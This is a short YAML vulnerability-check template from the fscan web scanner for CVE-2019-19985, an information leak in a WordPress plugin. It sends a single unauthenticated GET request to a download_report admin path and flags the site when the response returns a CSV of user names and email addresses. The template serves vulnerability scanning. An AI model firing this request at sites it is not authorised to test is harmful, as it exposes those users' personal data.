fscan/WebScan/pocs/wordpress-cve-2019-19985-in...

12 lines
477 B
YAML

name: poc-yaml-wordpress-cve-2019-19985-infoleak
rules:
- method: GET
path: "/wp-admin/admin.php?page=download_report&report=users&status=all"
follow_redirects: false
expression: >
response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"]))
detail:
author: bufsnake(https://github.com/bufsnake)
links:
- https://www.exploit-db.com/exploits/48698